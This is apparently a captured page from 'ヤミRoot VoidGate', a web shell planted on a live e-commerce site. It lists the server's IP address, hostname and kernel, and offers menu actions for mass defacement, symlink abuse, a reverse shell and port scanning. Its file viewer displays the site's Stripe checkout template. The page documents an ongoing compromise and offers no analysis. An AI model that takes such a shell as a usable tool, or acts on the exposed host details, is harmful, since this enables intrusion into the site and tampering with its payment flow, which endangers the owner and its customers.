ヤミRoot VoidGate
User / IP
:
216.73.217.162
Host / Server
:
15.235.182.215 / pollibazaar.com
System
:
Linux asia.cbnex.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
pollibazaar
/
public_html
/
resources
/
views
/
payment
/
Viewing: stripe.blade.php
@extends('payment.layouts.master') @push('script') <script src="https://polyfill.io/v3/polyfill.min.js?version=3.52.1&features=fetch"></script> <script src="https://js.stripe.com/v3/"></script> @endpush @section('content') <div> <h1 class="text-center">{{ "Please do not refresh this page..." }}</h1> </div> <script type="text/javascript"> var stripe = Stripe('{{$config->published_key}}'); document.addEventListener("DOMContentLoaded", function () { fetch("{{ url("payment/stripe/token/?payment_id={$data->id}") }}", { method: "GET", }).then(function (response) { console.log(response) return response.text(); }).then(function (session) { console.log(session) return stripe.redirectToCheckout({sessionId: JSON.parse(session).id}); }).then(function (result) { if (result.error) { alert(result.error.message); } }).catch(function (error) { console.error("error:", error); }); }); </script> @endsection
Coded With 💗 by
0x6ick